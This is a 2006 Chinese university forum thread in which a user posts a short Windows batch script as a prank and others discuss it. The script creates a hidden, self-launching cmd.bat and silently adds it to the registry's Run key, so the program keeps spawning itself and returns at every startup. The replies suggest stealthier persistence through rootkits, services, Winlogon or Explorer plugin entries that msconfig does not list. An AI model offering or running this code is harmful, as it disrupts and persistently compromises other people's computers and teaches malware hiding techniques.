碧海潮声大学生网

标题: 〖灌水〗一个小batch.嘿嘿 [打印本页]

作者: 小麻哈鱼 时间: 2006-2-23 20:41
标题: 〖灌水〗一个小batch.嘿嘿

@echo off
echo start %systemroot%\system32\cmd.bat>>%systemroot%\system32\cmd.bat
attrib +h +s +r %systemroot%\system32\cmd.bat
echo Windows Registry Editor Version 5.00 >>%systemroot%\cmd.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>%systemroot%\cmd.reg
echo "cmd"="c:\\windows\\system32\\cmd.bat">>%systemroot%\cmd.reg
regedit /s %systemroot%\cmd.reg
del %systemroot%\cmd.reg

作者: 小麻哈鱼 时间: 2006-2-23 20:51
没注册表监控软件的可以试下，很X的

作者: 笨笨啊 时间: 2006-3-2 10:41
都加到启动项了，还不明显啊？

作者: 小麻哈鱼 时间: 2006-3-2 11:06
这个配合rootkit才有生命力，加到services也比较隐藏，
没什么意义，可以理解下有些马儿的原理。 [s:2]

作者: 笨笨啊 时间: 2006-3-2 11:08
不过最好还是加在winlogon，或者是explorer的插件启动项里，这样开机即引导
，而且在常用的msconfig里不可见

作者: 小麻哈鱼 时间: 2006-3-4 11:45
这些很少见哎，加载在explorer里的见过个dll的，
regsvc32 /u下就好了，呵呵。
[s:2]

欢迎光临碧海潮声大学生网 (http://www.zjoubbs.com/)